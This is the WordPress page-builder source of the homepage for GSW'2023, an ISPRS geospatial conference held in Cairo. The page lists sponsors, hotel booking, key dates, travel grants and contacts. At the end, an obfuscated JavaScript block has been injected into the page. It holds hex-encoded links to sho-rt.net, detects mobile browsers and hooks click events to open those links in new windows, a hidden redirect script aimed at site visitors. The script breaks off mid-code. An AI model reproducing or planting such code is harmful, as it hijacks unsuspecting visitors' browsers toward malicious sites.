border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685608624099{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 